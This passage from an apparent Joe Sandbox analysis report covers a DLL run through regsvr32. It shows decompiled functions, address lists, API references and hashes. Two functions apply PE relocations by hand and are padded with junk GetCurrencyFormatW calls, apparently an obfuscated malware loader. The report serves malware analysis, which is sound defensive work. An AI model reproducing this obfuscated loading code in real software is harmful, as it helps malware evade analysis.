						_v32 = _v32 + 1;
						_v40 = _v40 + 0x28;
					} while (_v32 < GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff));
					goto L13;
				}
			}























                                                                                                            0x10002482
                                                                                                            0x10002494
                                                                                                            0x1000249c
                                                                                                            0x100024d0
                                                                                                            0x100024f0
                                                                                                            0x10002512
                                                                                                            0x10002516
                                                                                                            0x10002518
                                                                                                            0x10002534
                                                                                                            0x10002534
                                                                                                            0x10002567
                                                                                                            0x10002593
                                                                                                            0x100025bf
                                                                                                            0x100025c3
                                                                                                            0x100025d9
                                                                                                            0x100025e4
                                                                                                            0x100025ee
                                                                                                            0x100025f2
                                                                                                            0x100025f6
                                                                                                            0x10002616
                                                                                                            0x1000283b
                                                                                                            0x10002843
                                                                                                            0x1000284b
                                                                                                            0x10002852
                                                                                                            0x00000000
                                                                                                            0x1000261c
                                                                                                            0x1000261c
                                                                                                            0x10002644
                                                                                                            0x10002662
                                                                                                            0x1000267a
                                                                                                            0x100026a6
                                                                                                            0x100026c1
                                                                                                            0x100026c5
                                                                                                            0x10002787
                                                                                                            0x100027b7
                                                                                                            0x100027dc
                                                                                                            0x100027de
                                                                                                            0x100027ea
                                                                                                            0x10002803
                                                                                                            0x00000000
                                                                                                            0x10002803
                                                                                                            0x10002795
                                                                                                            0x100027a0
                                                                                                            0x100027ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100027b2
                                                                                                            0x00000000
                                                                                                            0x100026f2
                                                                                                            0x1000271a
                                                                                                            0x00000000
                                                                                                            0x1000285f
                                                                                                            0x10002731
                                                                                                            0x1000273c
                                                                                                            0x10002740
                                                                                                            0x1000274d
                                                                                                            0x10002752
                                                                                                            0x1000275d
                                                                                                            0x1000275d
                                                                                                            0x10002807
                                                                                                            0x10002807
                                                                                                            0x1000280b
                                                                                                            0x10002831
                                                                                                            0x00000000
                                                                                                            0x1000261c

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024D4
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100024F4
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000252B
                                                                                                              • Part of subcall function 10001DB6: GetCurrencyFormatW.KERNEL32 ref: 10001DCE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002545
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000256B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002597
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100025C3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100025FE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002628
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002648
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000267E
                                                                                                              • Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 100021FF
                                                                                                              • Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 10002222
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026D7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100026FE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002740
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002772
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002795
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100027C3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100027EE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000281C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-2712681272
                                                                                                            • Opcode ID: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
                                                                                                            • Instruction ID: aca6d6cc97a103aa38e8287a4bdca31c23581297dae163bc22dbee5c6a0af23b
                                                                                                            • Opcode Fuzzy Hash: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
                                                                                                            • Instruction Fuzzy Hash: 5DB16975648354BFE308CB50CD86F1BBBE8EB8AB48F11180EF7449A2D1C771E9508B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10026012 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10026012(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10048dc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10048dcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10048dd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10048dc8;
					_t40 = TlsSetValue;
					 *0x10048dd4 = _t7;
					if( *0x10048dc8 == 0) {
						L6:
						 *0x10048dcc = TlsGetValue;
						 *0x10048dc8 = E10025CC9;
						 *0x10048dd0 = _t40;
						 *0x10048dd4 = TlsFree;
					} else {
						__eflags =  *0x10048dcc;
						if( *0x10048dcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10048dd0;
							if( *0x10048dd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10045960 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10048dcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10020E51();
							 *0x10048dc8 = E10025BFA( *0x10048dc8);
							 *0x10048dcc = E10025BFA( *0x10048dcc);
							 *0x10048dd0 = E10025BFA( *0x10048dd0);
							 *0x10048dd4 = E10025BFA( *0x10048dd4);
							_t18 = E10023E72();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10025CFC();
								goto L15;
							} else {
								_push(E10025E88);
								_t21 =  *((intOrPtr*)(E10025C66( *0x10048dc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1004595c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1002695E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1004595c);
										__eflags =  *((intOrPtr*)(E10025C66( *0x10048dd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10025D39(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10025CFC();
					return 0;
				}
			}
















                                                                                                            0x10026012
                                                                                                            0x1002601e
                                                                                                            0x10026022
                                                                                                            0x10026042
                                                                                                            0x1002604f
                                                                                                            0x1002605c
                                                                                                            0x10026061
                                                                                                            0x10026063
                                                                                                            0x1002606a
                                                                                                            0x10026070
                                                                                                            0x10026075
                                                                                                            0x1002608d
                                                                                                            0x10026092
                                                                                                            0x1002609c
                                                                                                            0x100260a6
                                                                                                            0x100260ac
                                                                                                            0x10026077
                                                                                                            0x10026077
                                                                                                            0x1002607e
                                                                                                            0x00000000
                                                                                                            0x10026080
                                                                                                            0x10026080
                                                                                                            0x10026087
                                                                                                            0x00000000
                                                                                                            0x10026089
                                                                                                            0x10026089
                                                                                                            0x1002608b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002608b
                                                                                                            0x10026087
                                                                                                            0x1002607e
                                                                                                            0x100260b1
                                                                                                            0x100260b7
                                                                                                            0x100260ba
                                                                                                            0x100260bf
                                                                                                            0x10026191
                                                                                                            0x10026191
                                                                                                            0x10026191
                                                                                                            0x100260c5
                                                                                                            0x100260cc
                                                                                                            0x100260ce
                                                                                                            0x100260d0
                                                                                                            0x00000000
                                                                                                            0x100260d6
                                                                                                            0x100260d6
                                                                                                            0x100260ec
                                                                                                            0x100260fc
                                                                                                            0x1002610c
                                                                                                            0x10026119
                                                                                                            0x1002611e
                                                                                                            0x10026123
                                                                                                            0x10026125
                                                                                                            0x1002618c
                                                                                                            0x1002618c
                                                                                                            0x00000000
                                                                                                            0x10026127
                                                                                                            0x10026127
                                                                                                            0x10026138
                                                                                                            0x1002613a
                                                                                                            0x1002613d
                                                                                                            0x10026142
                                                                                                            0x00000000
                                                                                                            0x10026144
                                                                                                            0x10026150
                                                                                                            0x10026152
                                                                                                            0x10026156
                                                                                                            0x00000000
                                                                                                            0x10026158
                                                                                                            0x10026158
                                                                                                            0x10026159
                                                                                                            0x1002616d
                                                                                                            0x1002616f
                                                                                                            0x00000000
                                                                                                            0x10026171
                                                                                                            0x10026171
                                                                                                            0x10026173
                                                                                                            0x10026174
                                                                                                            0x1002617b
                                                                                                            0x10026181
                                                                                                            0x10026185
                                                                                                            0x10026189
                                                                                                            0x10026189
                                                                                                            0x1002616f
                                                                                                            0x10026156
                                                                                                            0x10026142
                                                                                                            0x10026125
                                                                                                            0x100260d0
                                                                                                            0x10026195
                                                                                                            0x10026024
                                                                                                            0x10026024
                                                                                                            0x1002602c
                                                                                                            0x1002602c

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,100207BA,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10026018
                                                                                                            • __mtterm.LIBCMT ref: 10026024
                                                                                                              • Part of subcall function 10025CFC: __decode_pointer.LIBCMT ref: 10025D0D
                                                                                                              • Part of subcall function 10025CFC: TlsFree.KERNEL32(00000020,10020856,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10025D27
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1002603A
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10026047
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10026054
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10026061
                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260B1
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260CC
                                                                                                            • __init_pointers.LIBCMT ref: 100260D6
                                                                                                            • __encode_pointer.LIBCMT ref: 100260E1
                                                                                                            • __encode_pointer.LIBCMT ref: 100260F1
                                                                                                            • __encode_pointer.LIBCMT ref: 10026101
                                                                                                            • __encode_pointer.LIBCMT ref: 10026111
                                                                                                            • __decode_pointer.LIBCMT ref: 10026132
                                                                                                            • __calloc_crt.LIBCMT ref: 1002614B
                                                                                                            • __decode_pointer.LIBCMT ref: 10026165
                                                                                                            • __initptd.LIBCMT ref: 10026174
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1002617B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 2657569430-3819984048
                                                                                                            • Opcode ID: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
                                                                                                            • Instruction ID: 704b4601cb084f4dd452549cd158f7ffd0a67ac7cd9a7aed0fe10d7678a8cbb0
                                                                                                            • Opcode Fuzzy Hash: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
                                                                                                            • Instruction Fuzzy Hash: 8631A435D02321AEF751EF74AD8490F3BE5EB56252B504926F401C72F2EB329940CF58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001E144 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001E144(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                            0x1001e151
                                                                                                            0x1001e15a
                                                                                                            0x1001e163
                                                                                                            0x1001e16d
                                                                                                            0x1001e177
                                                                                                            0x1001e181
                                                                                                            0x1001e18b
                                                                                                            0x1001e195
                                                                                                            0x1001e19f
                                                                                                            0x1001e1a9
                                                                                                            0x1001e1b3
                                                                                                            0x1001e1bd
                                                                                                            0x1001e1c2
                                                                                                            0x1001e1c9

                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E153
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E15C
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E166
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E170
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E17A
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E184
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E18E
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E198
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1A2
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1AC
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1B6
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                            • API String ID: 1228543026-2889995556
                                                                                                            • Opcode ID: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
                                                                                                            • Instruction ID: 4b9fafc3805f733a061432fadfe8ab03a294f1ea68a7cded52070413de5cc64b
                                                                                                            • Opcode Fuzzy Hash: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
                                                                                                            • Instruction Fuzzy Hash: 600144708007949ECB32EFB69C08C8BBAE5EED57117024D6EE2858F610E778E641CF84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000290C Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 251COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000290C(signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				unsigned int _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				signed short* _v24;
				int _t73;
				intOrPtr* _t80;
				short* _t132;
				short* _t156;

				_t156 = L"xadqsavcbdfewescGADW";
				_t132 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc + _v20;
				_t73 =  *_a4 + 0xa0 + (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _v20) * 8;
				_v20 = _t73;
				if( *((intOrPtr*)(_t73 + 4)) != 0) {
					_a4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) << 3;
					_t80 = (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) + _a4) *  *0x100440d0 +  *_v20 + _v16;
					while(1) {
						_a4 = _t80;
						if( *_t80 <= 0) {
							break;
						}
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 +  *_a4 + _v16;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + 8;
						_v24 = _v20 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 * 2 + _a4;
						_v20 = 0;
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						if(GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v12 == 0) {
							L7:
							_t80 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 4));
							continue;
						} else {
							goto L4;
						}
						do {
							L4:
							_v12 = ( *_v24 & 0x0000ffff) >> GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + 0xc;
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 + 0x00000fff &  *_v24 & 0x0000ffff;
							if(_v12 == 3) {
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 << 2;
								_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 + _v12 + _v8 + _v4;
								 *_v8 =  *_v8 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _a8;
							}
							_v20 = _v20 + 1;
							GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9);
							_v24 =  &(_v24[1]);
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						} while (_v20 < GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v8);
						goto L7;
					}
					return 1;
				}
				return 0 | _a8 == 0x00000000;
			}













                                                                                                            0x10002925
                                                                                                            0x1000292d
                                                                                                            0x1000293b
                                                                                                            0x10002954
                                                                                                            0x10002971
                                                                                                            0x10002988
                                                                                                            0x10002994
                                                                                                            0x10002998
                                                                                                            0x100029c3
                                                                                                            0x100029da
                                                                                                            0x10002bc6
                                                                                                            0x10002bc9
                                                                                                            0x10002bcd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002a0e
                                                                                                            0x10002a2a
                                                                                                            0x10002a48
                                                                                                            0x10002a52
                                                                                                            0x10002a78
                                                                                                            0x10002a89
                                                                                                            0x10002ba6
                                                                                                            0x10002bc4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002a8f
                                                                                                            0x10002a8f
                                                                                                            0x10002abe
                                                                                                            0x10002ade
                                                                                                            0x10002ae2
                                                                                                            0x10002b08
                                                                                                            0x10002b2d
                                                                                                            0x10002b44
                                                                                                            0x10002b44
                                                                                                            0x10002b46
                                                                                                            0x10002b56
                                                                                                            0x10002b58
                                                                                                            0x10002b8b
                                                                                                            0x10002b9c
                                                                                                            0x00000000
                                                                                                            0x10002a8f
                                                                                                            0x00000000
                                                                                                            0x10002bd5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000293F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002958
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002975
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100029B2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100029C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
                                                                                                            • Instruction ID: 79824c52bf8429aa3b3288a891149b50f2ccf3fe83c12eb32a247a59d7a1ec18
                                                                                                            • Opcode Fuzzy Hash: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
                                                                                                            • Instruction Fuzzy Hash: 19815971A44315BFE214DBA1CD86F1BBBECEB8AB48F01081EF7409A2D1D671A9108F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C177 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1000C177(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1001FC2D(E10033686, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10004e88);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010A4A(_t94, 0x10048490, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E10004E6E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000EC09(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1004886c;
						if( *0x1004886c == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1004846c;
								if( *0x1004846c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1004846c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
